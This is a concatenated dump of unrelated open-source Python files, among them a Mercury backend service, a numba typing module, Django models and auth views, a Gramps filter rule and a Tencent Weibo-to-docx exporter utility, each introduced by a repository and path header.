def reacquire(inventory_url, backend_name):
"""
:param inventory_url:
:param backend_name:
:return:
"""
# Onetime use synchronous client
log.info('Attempting to reacquire active agents')
log.debug('Inventory Router: {}'.format(inventory_url))
inventory_client = InventoryClient(inventory_url,
# TODO: Add these to configuration
response_timeout=60,
rcv_retry=10)
existing_documents = inventory_client.query({'active': {'$ne': None},
'origin.name': backend_name},
projection={'mercury_id': 1,
'active': 1})
if existing_documents.get('error'): # Transport Error
log.error('[BACKEND CRITICAL] '
'Error communicating with inventory service, could not '
'reacquire: <{}>'.format(existing_documents.get('message')))
# Return without reacquiring any nodes. Once communication is
# reestablished, agents will begin to re-register
return
for doc in existing_documents['message']['items']:
if not BackendController.validate_agent_info(doc['active']):
log.error('Found junk in document {} expunging'.format(
doc['mercury_id']))
            inventory_client.update_one(doc['mercury_id'], {'active': None})
            continue
log.info('Attempting to reacquire %s : %s' % (
doc['mercury_id'], doc['active']['rpc_address']))
add_active_record(doc)
log.info('Reacquire operation complete')
inventory_client.close()
def configure_logging(config):
""" Configure logging for application
:param config: A namespace provided from MercuryConfiguration.parse_args
"""
logging.basicConfig(level=logging.getLevelName(config.logging.level),
format=config.logging.format)
if config.subtask_debug:
logging.getLogger('mercury.rpc.ping').setLevel(logging.DEBUG)
logging.getLogger('mercury.rpc.ping2').setLevel(logging.DEBUG)
logging.getLogger('mercury.rpc.jobs.monitor').setLevel(logging.DEBUG)
if config.asyncio_debug:
logging.getLogger('mercury.rpc.active_asyncio').setLevel(logging.DEBUG)
def main():
""" Entry point """
config = parse_options()
configure_logging(config)
# Create the event loop
loop = zmq.asyncio.ZMQEventLoop()
# If config.asyncio_debug == True, enable debug
loop.set_debug(config.asyncio_debug)
# Set the zmq event loop as the default event loop
asyncio.set_event_loop(loop)
# Create Async Clients
inventory_client = AsyncInventoryClient(config.backend.inventory_router,
linger=0,
response_timeout=10,
rcv_retry=3)
rpc_client = AsyncRPCClient(config.backend.rpc_router,
linger=0,
response_timeout=10,
rcv_retry=3)
# Create a backend instance
server = BackEndService(config.backend.agent_service.bind_address,
inventory_client,
rpc_client,
config.backend.origin.name,
config.backend.origin.datacenter,
config.backend.origin.queue_service_vip,
config.backend.origin.queue_service_port)
reacquire(config.backend.inventory_router, config.backend.origin.name)
# Inject ping loop
asyncio.ensure_future(ping_loop(
ctx=server.context,
ping_interval=config.backend.ping.interval,
cycle_time=config.backend.ping.cycle_time,
initial_ping_timeout=config.backend.ping.initial_timeout,
ping_retries=config.backend.ping.retries,
backoff=config.backend.ping.backoff,
max_to_schedule=config.backend.ping.max_to_schedule,
loop=loop,
inventory_router_url=config.backend.inventory_router,
rpc_client=rpc_client),
loop=loop)
log.info('Starting Mercury Backend Service')
try:
loop.run_until_complete(server.start())
except KeyboardInterrupt:
# TODO: Add generic backend TERM handler
log.info('Sending kill signals')
stop_ping()
server.kill()
finally:
pending = asyncio.Task.all_tasks(loop=loop)
log.debug('Waiting on {} pending tasks'.format(len(pending)))
loop.run_until_complete(asyncio.gather(*pending))
log.debug('Shutting down event loop')
loop.close()
if __name__ == '__main__':
main()
# --- googleads/googleads-python-lib :: examples/ad_manager/v202105/forecast_service/get_delivery_forecast_for_line_items.py (license: Apache-2.0) ---
#!/usr/bin/env python
#
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example gets a delivery forecast for two existing line items.
To determine which line items exist, run get_all_line_items.py.
"""
# Import appropriate modules from the client library.
from googleads import ad_manager
# Set the line items to get forecasts for.
LINE_ITEM_ID_1 = 'INSERT_LINE_ITEM_1_ID_HERE'
LINE_ITEM_ID_2 = 'INSERT_LINE_ITEM_2_ID_HERE'
def main(client, line_item_id1, line_item_id2):
# Initialize appropriate service.
forecast_service = client.GetService('ForecastService', version='v202105')
# Get forecast for line item.
forecast = forecast_service.getDeliveryForecastByIds(
[line_item_id1, line_item_id2], {'ignoredLineItemIds': []})
for single_forecast in forecast['lineItemDeliveryForecasts']:
unit_type = single_forecast['unitType']
print('Forecast for line item %d:\n\t%d %s matched\n\t%d %s delivered\n\t'
'%d %s predicted\n' % (
single_forecast['lineItemId'], single_forecast['matchedUnits'],
unit_type, single_forecast['deliveredUnits'], unit_type,
single_forecast['predictedDeliveryUnits'], unit_type))
if __name__ == '__main__':
# Initialize client object.
ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
main(ad_manager_client, LINE_ITEM_ID_1, LINE_ITEM_ID_2)
# --- CMLL/Flask-Fixtures :: setup.py (license: MIT) ---
"""
Flask-Fixtures
--------------
A fixtures library for testing Flask apps.
"""
import os
import subprocess
from setuptools import setup
root_dir = os.path.abspath(os.path.dirname(__file__))
package_dir = os.path.join(root_dir, 'flask_fixtures')
# Try to get the long description from the README file or the module's
# docstring if the README isn't available.
try:
README = open(os.path.join(root_dir, 'README.rst')).read()
except:
README = __doc__
setup(
name='Flask-Fixtures',
version='0.3.4',
url='https://github.com/croach/Flask-Fixtures',
license='MIT License',
author='Christopher Roach',
author_email='[email protected]',
maintainer='Christopher Roach',
maintainer_email='[email protected]',
description='A simple library for adding database fixtures for unit tests using nothing but JSON or YAML.',
long_description=README,
# py_modules=['flask_fixtures'],
# if you would be using a package instead use packages instead
# of py_modules:
packages=['flask_fixtures'],
zip_safe=False,
include_package_data=True,
platforms='any',
install_requires=[
'Flask',
'Flask-SQLAlchemy'
],
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Web Environment',
'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Software Development :: Testing'
]
)
# --- sklam/numba :: numba/core/typing/typeof.py (license: BSD-2-Clause) ---
from collections import namedtuple
from functools import singledispatch
import ctypes
import enum
import numpy as np
from numba.core import types, utils, errors
from numba.np import numpy_support
# terminal color markup
_termcolor = errors.termcolor()
class Purpose(enum.Enum):
# Value being typed is used as an argument
argument = 1
# Value being typed is used as a constant
constant = 2
_TypeofContext = namedtuple("_TypeofContext", ("purpose",))
def typeof(val, purpose=Purpose.argument):
"""
Get the Numba type of a Python value for the given purpose.
"""
# Note the behaviour for Purpose.argument must match _typeof.c.
c = _TypeofContext(purpose)
ty = typeof_impl(val, c)
if ty is None:
msg = _termcolor.errmsg(
"cannot determine Numba type of %r") % (type(val),)
raise ValueError(msg)
return ty
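# Illustrative, hedged examples of the mapping (exact reprs vary by version):
#
#     typeof(1.0)               # -> types.float64
#     typeof("abc")             # -> types.string
#     typeof(np.zeros((2, 2)))  # -> types.Array(float64, 2, 'C')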
@singledispatch
def typeof_impl(val, c):
"""
Generic typeof() implementation.
"""
tp = _typeof_buffer(val, c)
if tp is not None:
return tp
# cffi is handled here as it does not expose a public base class
# for exported functions or CompiledFFI instances.
from numba.core.typing import cffi_utils
if cffi_utils.SUPPORTED:
if cffi_utils.is_cffi_func(val):
return cffi_utils.make_function_type(val)
if cffi_utils.is_ffi_instance(val):
return types.ffi
return getattr(val, "_numba_type_", None)
def _typeof_buffer(val, c):
from numba.core.typing import bufproto
try:
m = memoryview(val)
except TypeError:
return
# Object has the buffer protocol
try:
dtype = bufproto.decode_pep3118_format(m.format, m.itemsize)
except ValueError:
return
type_class = bufproto.get_type_class(type(val))
layout = bufproto.infer_layout(m)
return type_class(dtype, m.ndim, layout=layout,
readonly=m.readonly)
@typeof_impl.register(ctypes._CFuncPtr)
def typeof_ctypes_function(val, c):
from .ctypes_utils import is_ctypes_funcptr, make_function_type
if is_ctypes_funcptr(val):
return make_function_type(val)
@typeof_impl.register(type)
def typeof_type(val, c):
"""
Type various specific Python types.
"""
if issubclass(val, BaseException):
return types.ExceptionClass(val)
if issubclass(val, tuple) and hasattr(val, "_asdict"):
return types.NamedTupleClass(val)
if issubclass(val, np.generic):
return types.NumberClass(numpy_support.from_dtype(val))
from numba.typed import Dict
if issubclass(val, Dict):
return types.TypeRef(types.DictType)
from numba.typed import List
if issubclass(val, List):
return types.TypeRef(types.ListType)
@typeof_impl.register(bool)
def _typeof_bool(val, c):
return types.boolean
@typeof_impl.register(float)
def _typeof_float(val, c):
return types.float64
@typeof_impl.register(complex)
def _typeof_complex(val, c):
return types.complex128
def _typeof_int(val, c):
# As in _typeof.c
nbits = utils.bit_length(val)
if nbits < 32:
typ = types.intp
elif nbits < 64:
typ = types.int64
elif nbits == 64 and val >= 0:
typ = types.uint64
else:
raise ValueError("Int value is too large: %s" % val)
return typ
for cls in utils.INT_TYPES:
typeof_impl.register(cls, _typeof_int)
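# For example, utils.bit_length(2**40) == 41, so such an int is typed as
# types.int64; 2**63 occupies exactly 64 bits and is non-negative, so it
# becomes types.uint64; anything wider raises ValueError.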
@typeof_impl.register(np.generic)
def _typeof_numpy_scalar(val, c):
try:
return numpy_support.map_arrayscalar_type(val)
except NotImplementedError:
pass
@typeof_impl.register(str)
def _typeof_str(val, c):
return types.string
@typeof_impl.register(type((lambda a: a).__code__))
def _typeof_code(val, c):
return types.code_type
@typeof_impl.register(type(None))
def _typeof_none(val, c):
return types.none
@typeof_impl.register(type(Ellipsis))
def _typeof_ellipsis(val, c):
return types.ellipsis
@typeof_impl.register(tuple)
def _typeof_tuple(val, c):
tys = [typeof_impl(v, c) for v in val]
if any(ty is None for ty in tys):
return
return types.BaseTuple.from_types(tys, type(val))
@typeof_impl.register(list)
def _typeof_list(val, c):
if len(val) == 0:
raise ValueError("Cannot type empty list")
ty = typeof_impl(val[0], c)
if ty is None:
raise ValueError(
"Cannot type list element of {!r}".format(type(val[0])),
)
return types.List(ty, reflected=True)
@typeof_impl.register(set)
def _typeof_set(val, c):
if len(val) == 0:
raise ValueError("Cannot type empty set")
item = next(iter(val))
ty = typeof_impl(item, c)
return types.Set(ty, reflected=True)
@typeof_impl.register(slice)
def _typeof_slice(val, c):
return types.slice2_type if val.step in (None, 1) else types.slice3_type
@typeof_impl.register(enum.Enum)
@typeof_impl.register(enum.IntEnum)
def _typeof_enum(val, c):
clsty = typeof_impl(type(val), c)
return clsty.member_type
@typeof_impl.register(enum.EnumMeta)
def _typeof_enum_class(val, c):
cls = val
members = list(cls.__members__.values())
if len(members) == 0:
raise ValueError("Cannot type enum with no members")
dtypes = {typeof_impl(mem.value, c) for mem in members}
if len(dtypes) > 1:
raise ValueError("Cannot type heterogeneous enum: "
"got value types %s"
% ", ".join(sorted(str(ty) for ty in dtypes)))
if issubclass(val, enum.IntEnum):
typecls = types.IntEnumClass
else:
typecls = types.EnumClass
return typecls(cls, dtypes.pop())
@typeof_impl.register(np.dtype)
def _typeof_dtype(val, c):
tp = numpy_support.from_dtype(val)
return types.DType(tp)
@typeof_impl.register(np.ndarray)
def _typeof_ndarray(val, c):
try:
dtype = numpy_support.from_dtype(val.dtype)
except NotImplementedError:
raise ValueError("Unsupported array dtype: %s" % (val.dtype,))
layout = numpy_support.map_layout(val)
readonly = not val.flags.writeable
return types.Array(dtype, val.ndim, layout, readonly=readonly)
@typeof_impl.register(types.NumberClass)
def typeof_number_class(val, c):
return val
@typeof_impl.register(types.Literal)
def typeof_literal(val, c):
return val
@typeof_impl.register(types.TypeRef)
def typeof_typeref(val, c):
return val
@typeof_impl.register(types.Type)
def typeof_type_instance(val, c):
if isinstance(val, types.BaseFunction):
return val
elif isinstance(val, (types.Number, types.Boolean)):
return types.NumberClass(val)
else:
return types.TypeRef(val)
# --- xingnix/learning :: imageprocessing/python/10/segment.py (license: GPL-3.0) ---
import matplotlib.pyplot as plt
import numpy as np
import cv2
from skimage import io,color,data,filters,exposure,util,transform
#plt.switch_backend('qt5agg')
def otsu():
    im = data.coins()
    f = np.zeros(255)
    maxf = 0   # best (largest) separability criterion seen so far
    maxi = 0   # threshold that achieved it
    for i in range(100, 200):
        c1 = im[im <= i]
        c2 = im[im > i]
        m1 = np.mean(c1)
        m2 = np.mean(c2)
        std1 = np.std(c1)
        std2 = np.std(c2)
        std3 = np.std([m1, m2])
        # Otsu-style criterion: between-class spread over within-class spread.
        f[i] = std3 / (1 + std1 * std2)
        if f[i] > maxf:
            maxf = f[i]
            maxi = i
    io.imsave('coins.png', im)
    io.imsave('coins-otsu.png', np.uint8(im > maxi) * 255)
def line_detect():
    im = data.text()
    seg = im < 100
    r = transform.radon(seg)
    rho, theta = np.unravel_index(np.argmax(r), r.shape)
    rho = rho - r.shape[0] / 2
    x = np.int(rho * np.cos((theta + 90) * np.pi / 180) + im.shape[0] / 2)
    y = np.int(rho * np.sin((theta + 90) * np.pi / 180) + im.shape[1] / 2)
    dx = np.cos(theta * np.pi / 180)
    dy = np.sin(theta * np.pi / 180)
    l = 1000
    res = im.copy()
    cv2.line(res, (np.int(y - dy * l), np.int(x - dx * l)),
             (np.int(y + dy * l), np.int(x + dx * l)), 255, 2)
    io.imsave('text.png', im)
    io.imsave('text-line.png', res)
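# A minimal driver so the script can be run directly; it assumes write access
# to the working directory, where both functions save their PNG results.
if __name__ == '__main__':
    otsu()
    line_detect()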
# --- AstroMatt/esa-time-perception :: backend/api_v2/models/trial.py (license: MIT) ---
import json
import statistics
from django.db import models
from django.db.models import DateTimeField
from django.db.models import CharField
from django.db.models import FloatField
from django.db.models import EmailField
from django.db.models import BooleanField
from django.db.models import PositiveSmallIntegerField
from django.db.models import TextField
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
from backend.api_v2.models import Click
from backend.api_v2.models import Event
from backend.api_v2.models import Survey
class Trial(models.Model):
TIME_MORNING = 'morning'
TIME_EVENING = 'evening'
TIME_OTHER = 'other'
TIME_CHOICES = [
(TIME_MORNING, _('Morning')),
(TIME_EVENING, _('Evening')),
(TIME_OTHER, _('Other')),
]
http_request_sha1 = CharField(verbose_name=_('SHA1'), max_length=40, db_index=True, unique=True, null=True, blank=True, default=None)
start_datetime = DateTimeField(verbose_name=_('Start datetime'), db_index=True)
end_datetime = DateTimeField(verbose_name=_('End datetime'))
colors = CharField(verbose_name=_('Color order'), max_length=50)
device = CharField(verbose_name=_('Device'), max_length=50)
location = CharField(verbose_name=_('Location'), max_length=50)
time = CharField(verbose_name=_('Time'), max_length=30, choices=TIME_CHOICES, null=True, blank=True, default=None)
uid = EmailField(verbose_name=_('User ID'), db_index=True)
polarization = CharField(verbose_name=_('Polarization'), max_length=50, null=True, blank=True, default=None)
timeout = FloatField(verbose_name=_('Timeout'), help_text=_('Seconds per color'))
regularity = PositiveSmallIntegerField(verbose_name=_('Regularity'), help_text=_('Click every X seconds'))
    attempt = PositiveSmallIntegerField(verbose_name=_('Attempt'), null=True, blank=True, default=None)
is_valid = BooleanField(verbose_name=_('Valid?'), default=None, blank=True, null=True, db_index=True)
time_between_clicks = TextField(verbose_name=_('Time between clicks'), blank=True, null=True, default=None)
count_all = PositiveSmallIntegerField(verbose_name=_('Count'), null=True, blank=True)
count_blue = PositiveSmallIntegerField(verbose_name=_('Count - blue'), null=True, blank=True)
count_red = PositiveSmallIntegerField(verbose_name=_('Count - red'), null=True, blank=True)
count_white = PositiveSmallIntegerField(verbose_name=_('Count - white'), null=True, blank=True)
tempo_all = FloatField(verbose_name=_('Tempo'), null=True, blank=True)
tempo_blue = FloatField(verbose_name=_('Tempo - blue'), null=True, blank=True)
tempo_red = FloatField(verbose_name=_('Tempo - red'), null=True, blank=True)
tempo_white = FloatField(verbose_name=_('Tempo - white'), null=True, blank=True)
regularity_all = FloatField(verbose_name=_('Regularity'), null=True, blank=True)
regularity_blue = FloatField(verbose_name=_('Regularity - blue'), null=True, blank=True)
regularity_red = FloatField(verbose_name=_('Regularity - red'), null=True, blank=True)
regularity_white = FloatField(verbose_name=_('Regularity - white'), null=True, blank=True)
interval_all = FloatField(verbose_name=_('Interval'), null=True, blank=True)
interval_blue = FloatField(verbose_name=_('Interval - blue'), null=True, blank=True)
interval_red = FloatField(verbose_name=_('Interval - red'), null=True, blank=True)
interval_white = FloatField(verbose_name=_('Interval - white'), null=True, blank=True)
def get_absolute_url(self):
return reverse('api-v2:report', args=[self.uid])
@property
def survey(self):
return Survey.objects.get(trial=self)
@staticmethod
def add(http_request_sha1, trial, surveys, clicks, events):
trial, _ = Trial.objects.get_or_create(http_request_sha1=http_request_sha1, defaults=trial)
if surveys:
Survey.objects.get_or_create(trial=trial, **Survey.clean(surveys))
for click in clicks:
Click.objects.get_or_create(trial=trial, **click)
for event in events:
Event.objects.get_or_create(trial=trial, **event)
trial.validate()
trial.calculate()
Click.objects.filter(trial=trial).delete()
Event.objects.filter(trial=trial).delete()
return trial
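    # A hedged usage sketch; the payload shapes below are assumptions inferred
    # from the model fields, not a confirmed API contract:
    #
    #     Trial.add(
    #         http_request_sha1="<40-char sha1>",
    #         trial={"start_datetime": now, "end_datetime": later,
    #                "colors": "blue,red,white", "device": "touchscreen",
    #                "location": "lab", "uid": "[email protected]",
    #                "timeout": 60.0, "regularity": 3},
    #         surveys={...}, clicks=[{"color": "blue", "datetime": t}, ...],
    #         events=[])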
def __str__(self):
return f'[{self.start_datetime:%Y-%m-%d %H:%M}] ({self.location}, {self.device}) {self.uid}'
class Meta:
verbose_name = _('Trial')
verbose_name_plural = _('Trials')
def get_data(self):
data = self.__dict__.copy()
data.pop('_state')
return data
def save(self, *args, **kwargs):
self.uid = self.uid.lower()
return super().save(*args, **kwargs)
def validate(self):
self.validate_clicks('blue')
self.validate_clicks('red')
self.validate_clicks('white')
self.validate_trial()
def calculate(self):
self.calculate_count()
self.calculate_tempo()
self.calculate_regularity()
self.calculate_interval()
def validate_clicks(self, color, elements_to_drop=2):
clicks = Click.objects.filter(trial=self, color=color).order_by('datetime')
for invalid in clicks[:elements_to_drop]:
invalid.is_valid = False
invalid.save()
for valid in clicks[elements_to_drop:]:
valid.is_valid = True
valid.save()
def validate_trial(self, min=25, max=200):
if not self.tempo_all:
self.calculate()
if min <= self.tempo_all <= max:
self.is_valid = True
else:
self.is_valid = False
self.save()
def get_time_between_clicks(self):
"""
        Compute the per-color time intervals used for the regularity metrics.
        1. For every click of a color, subtract the timestamp of the previous
           click (n) from the next one (n+1), giving the intervals between clicks.
        2. >>> {"red": [1.025, 0.987, 1.000, 1.01...], "white": [...], "blue": [...], "all": [...]}
"""
clicks = Click.objects.filter(trial=self, is_valid=True).order_by('datetime')
def get_time_deltas(series):
for i in range(1, len(series)):
d1 = series[i - 1].datetime
d2 = series[i].datetime
yield (d2 - d1).total_seconds()
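        # e.g. clicks at t = 0.0 s, 1.0 s and 2.1 s yield deltas [1.0, 1.1]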
blue = list(get_time_deltas(clicks.filter(color='blue')))
red = list(get_time_deltas(clicks.filter(color='red')))
white = list(get_time_deltas(clicks.filter(color='white')))
time_regularity_series = {
'all': blue + red + white,
'blue': blue,
'red': red,
'white': white}
self.time_between_clicks = json.dumps(time_regularity_series)
self.save()
return time_regularity_series
def calculate_count(self):
clicks = Click.objects.filter(trial=self, is_valid=True)
self.count_all = clicks.all().count()
self.count_blue = clicks.filter(color='blue').count()
self.count_red = clicks.filter(color='red').count()
self.count_white = clicks.filter(color='white').count()
self.save()
def calculate_tempo(self, precision=2):
"""
        Count the clicks on each of the colours and sum them.
        1. Determine the percentage tempo coefficient: (duration / expected
           click interval) corresponds to 100%; n clicks correspond to x%.
        2. Compute the percentage coefficients (from the step above) for each
           colour separately.
        3. >>> {"white": 100, "red": 110, "blue": 90} // values are percentages
"""
percent_coefficient = float(self.timeout) / float(self.regularity)
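        # Worked example (assumed values): timeout=60 s and regularity=1 s
        # give percent_coefficient=60, so 54 blue clicks -> 54 / 60 * 100 = 90.0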
self.tempo_all = round(self.count_all / (percent_coefficient * 3) * 100, precision)
self.tempo_blue = round(self.count_blue / percent_coefficient * 100, precision)
self.tempo_red = round(self.count_red / percent_coefficient * 100, precision)
self.tempo_white = round(self.count_white / percent_coefficient * 100, precision)
self.save()
def calculate_regularity(self, precision=4):
"""
        Compute the standard deviation for all clicks together (after joining
        the per-colour lists - 60 elements) and for each colour separately
        (lists of 20 elements each); the implementation delegates to
        statistics.stdev:
        1. square every element of the list
        2. sum the squares
        3. take the square root of the sum
        4. divide the root by the number of elements
"""
clicks = self.get_time_between_clicks()
def stdev(series):
try:
return round(statistics.stdev(series), precision)
except statistics.StatisticsError:
return None
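        # statistics.stdev() raises StatisticsError for fewer than two
        # samples, hence the None guard above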
self.regularity_all = stdev(clicks['all'])
self.regularity_blue = stdev(clicks['blue'])
self.regularity_red = stdev(clicks['red'])
self.regularity_white = stdev(clicks['white'])
self.save()
def calculate_interval(self, precision=4):
clicks = self.get_time_between_clicks()
def mean(series):
try:
mean = round(statistics.mean(series), precision)
return abs(mean)
except statistics.StatisticsError:
return None
self.interval_all = mean(clicks['all'])
self.interval_blue = mean(clicks['blue'])
self.interval_red = mean(clicks['red'])
self.interval_white = mean(clicks['white'])
self.save()
| mit | 3,254,712,368,374,055,000 | 40.991304 | 190 | 0.640609 | false |
Forage/Gramps | gramps/gen/filters/rules/person/_hasalternatename.py | 1 | 1841 | #
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2010 Gramps
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# gen.filters.rules/Person/_HasAlternateName.py
# $Id$
#
#-------------------------------------------------------------------------
#
# Standard Python modules
#
#-------------------------------------------------------------------------
from ....const import GRAMPS_LOCALE as glocale
_ = glocale.get_translation().gettext
#-------------------------------------------------------------------------
#
# GRAMPS modules
#
#-------------------------------------------------------------------------
from .. import Rule
#-------------------------------------------------------------------------
#
# HasAlternateName
#
#-------------------------------------------------------------------------
class HasAlternateName(Rule):
"""Rule that checks an alternate name"""
name = _('People with an alternate name')
description = _("Matches people with an alternate name")
category = _('General filters')
def apply(self, db, person):
if person.get_alternate_names():
return True
else:
return False
| gpl-2.0 | 2,634,163,403,224,166,400 | 32.472727 | 75 | 0.532863 | false |
fatiherikli/komposto.org | auth/views.py | 1 | 2165 | import json
from django.contrib.auth import logout, login, authenticate
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.http import HttpResponse
from django.db.models import Q, Count
from django.views.generic import (
FormView, CreateView, RedirectView, DetailView, UpdateView
)
from auth.mixins import LoginRequiredMixin
from auth.forms import (RegistrationForm, AuthenticationForm,
ProfileUpdateForm)
class RegistrationView(CreateView):
form_class = RegistrationForm
template_name = "auth/register.html"
def form_valid(self, form):
response = super(RegistrationView, self).form_valid(form)
user = authenticate(username=form.cleaned_data["username"],
password=form.cleaned_data["password1"])
login(self.request, user)
return response
def get_success_url(self):
return reverse("home")
class LoginView(FormView):
form_class = AuthenticationForm
template_name = "auth/login.html"
def form_valid(self, form):
login(self.request, form.get_user())
return super(LoginView, self).form_valid(form)
def get_success_url(self):
return self.request.GET.get("next") or reverse("home")
def get_context_data(self, **kwargs):
context = super(LoginView, self).get_context_data(**kwargs)
context["next"] = self.request.GET.get("next", "")
return context
class LogoutView(LoginRequiredMixin, RedirectView):
def get(self, request, *args, **kwargs):
logout(request)
return super(LogoutView, self).get(request, *args, **kwargs)
def get_redirect_url(self, **kwargs):
return reverse("home")
class ProfileDetailView(DetailView):
slug_field = 'username'
slug_url_kwarg = 'username'
context_object_name = "profile"
model = User
class ProfileUpdateView(LoginRequiredMixin, UpdateView):
form_class = ProfileUpdateForm
def get_object(self, queryset=None):
return self.request.user
def get_success_url(self):
return '/'
| mit | 2,634,806,515,822,161,400 | 29.069444 | 68 | 0.684988 | false |
coolcooldool/tencent-weibo-exporter | version15/tencent_util.py | 1 | 12471 | # -*- coding: utf-8 -*-
'''
Created on 2017/12/21
@author: yuyang
'''
import os
from urllib import request
import uuid
import re
import docx_ext
from docx.shared import Pt
from docx.shared import RGBColor
from docx.shared import Inches
JPEG_EXTENSION = '.jpg'
PNG_EXTENSION = '.png'
GIF_EXTENSION = '.gif'
SPLIT_STRING = '///'
TOPIC_STRING = 'TTOOPPIICC'
EMOJI_STRING = 'EEMMOOJJII'
FRIEND_STRING = 'FFRRIIEENNDD'
URL_STRING = 'UURRLL'
QQEMO_STRING = 'QQEEMMOO'
OTHEREMO_STRING = 'OOTTHHEERR'
def add_author(document, author):
para = document.add_paragraph()
run = para.add_run(author)
font = run.font
#font.name = 'Microsoft YaHei'
font.size = Pt(12)
font.color.rgb = RGBColor(0x43, 0x6E, 0xEE)
def add_content(document, content, para = None, font_size = 16):
if content.__contains__('k.t.qq.com'):
pattern = re.compile(r'(<a href="http://k.t.qq.com.*?</a>)', re.S)
topics = re.findall(pattern, content)
for topic in topics:
topic_word = topic.split('#')[1]
content = content.replace(topic, SPLIT_STRING + TOPIC_STRING + '#' + topic_word + '#' + SPLIT_STRING)
if content.__contains__('www/mb/images/emoji'):
pattern_emoji = re.compile(r'(<img.*?>)', re.S)
pattern_emoji_img = re.compile(r"crs='(.*?)'", re.S)
emojis = re.findall(pattern_emoji, content)
for emoji in emojis:
emoji_url = re.findall(pattern_emoji_img, emoji)[0]
filename = download_pic(emoji_url, PNG_EXTENSION)
content = content.replace(emoji, SPLIT_STRING + EMOJI_STRING + filename + SPLIT_STRING)
if content.__contains__('em rel="@'):
pattern_friend = re.compile(r'(<em rel=.*?</em>)', re.S)
pattern_friend_name = re.compile(r'<em.*?title="(.*?)"', re.S)
friends = re.findall(pattern_friend, content)
for friend in friends:
friend_name = re.findall(pattern_friend_name, friend)[0]
content = content.replace(friend, SPLIT_STRING + FRIEND_STRING + friend_name + SPLIT_STRING)
if content.__contains__('http://url.cn'):
pattern_url = re.compile(r'(<a href=.*?</a>)', re.S)
pattern_url_str = re.compile(r'<a href="(.*?)"', re.S)
urls = re.findall(pattern_url, content)
for url in urls:
url_str = re.findall(pattern_url_str, url)[0]
content = content.replace(url, SPLIT_STRING + URL_STRING + url_str + SPLIT_STRING)
if content.__contains__('www/mb/images/face'):
pattern_qqemo = re.compile(r'(<img.*?>)', re.S)
pattern_qqemo_img = re.compile(r"crs='(.*?)'", re.S)
qqemos = re.findall(pattern_qqemo, content)
for qqemo in qqemos:
qqemo_url = re.findall(pattern_qqemo_img, qqemo)[0]
filename = download_pic(qqemo_url, GIF_EXTENSION)
content = content.replace(qqemo, SPLIT_STRING + QQEMO_STRING + filename + SPLIT_STRING)
if content.__contains__('<img class='):
pattern_other_emo = re.compile(r'(<img.*?>)', re.S)
pattern_other_emo_img = re.compile(r'<img.*?crs=(.*?) title=', re.S)
pattern_other_emo_img_only = re.compile(r'<img.*?crs=(.*?)>', re.S)
#<img class='crs dn' crs='http://qzonestyle.gtimg.cn/qzone/em/e2043.gif'>
pattern_other_emos = re.findall(pattern_other_emo, content)
for other_emo in pattern_other_emos:
other_emo_match = re.findall(pattern_other_emo_img, other_emo)
if not other_emo_match:# some emoji have special pattern
other_emo_match = re.findall(pattern_other_emo_img_only, other_emo)
other_emo_url = other_emo_match[0]
            other_emo_url = other_emo_url[1:-1]  # strip the surrounding quote marks (' or ")
filename = download_pic(other_emo_url, other_emo_url[-4:])
content = content.replace(other_emo, SPLIT_STRING + OTHEREMO_STRING + filename + SPLIT_STRING)
content_parts = content.split(SPLIT_STRING)
if not para:
para = document.add_paragraph()
for content_part in content_parts:
# delete first <div> mark
if content_part.startswith('<div>'):
content_part = content_part[5:]
if content_part.startswith(TOPIC_STRING):
run = para.add_run(content_part.replace(TOPIC_STRING, ''))
font = run.font
font.italic = True
font.bold = False
font.size = Pt(font_size)
font.color.rgb = RGBColor(0x00, 0x00, 0xCD)
elif content_part.startswith(EMOJI_STRING):
run = para.add_run()
filename = content_part.replace(EMOJI_STRING, '')
run.add_picture(filename)
elif content_part.startswith(FRIEND_STRING):
run = para.add_run(content_part.replace(FRIEND_STRING, ''))
font = run.font
font.italic = True
font.bold = False
font.size = Pt(font_size - 2)
font.color.rgb = RGBColor(0xFF, 0x45, 0x00)
elif content_part.startswith(URL_STRING):
docx_ext.add_hyperlink(para, content_part.replace(URL_STRING, ''),
content_part.replace(URL_STRING, ''), '1E90FF', True)
elif content_part.startswith(QQEMO_STRING):
run = para.add_run()
filename = content_part.replace(QQEMO_STRING, '')
run.add_picture(filename)
elif content_part.startswith(OTHEREMO_STRING):
run = para.add_run()
filename = content_part.replace(OTHEREMO_STRING, '')
run.add_picture(filename)
else:
content_part = content_part.replace('&', '&')
content_part = content_part.replace('>', '>')
content_part = content_part.replace('"', '"')
content_part = content_part.replace('<', '<')
run = para.add_run(content_part)
font = run.font
font.bold = False
font.size = Pt(font_size)
font.color.rgb = RGBColor(0x08, 0x08, 0x08)
def add_quotation(document, quotation):
if not quotation:
return
quotation_items = analyze_quotation(quotation)
para = document.add_paragraph(style='IntenseQuote')
if len(quotation_items) == 1:
run = para.add_run(quotation_items[0])
font = run.font
font.bold = False
font.size = Pt(12)
font.color.rgb = RGBColor(0xA9, 0xA9, 0xA9)
return
run = para.add_run(quotation_items[0] + u':')
font = run.font
font.bold = False
font.size = Pt(12)
font.color.rgb = RGBColor(0x48, 0xD1, 0xCC)
add_content(document, quotation_items[1] + '\n', para, 12)
filenames = analyze_pic(quotation)
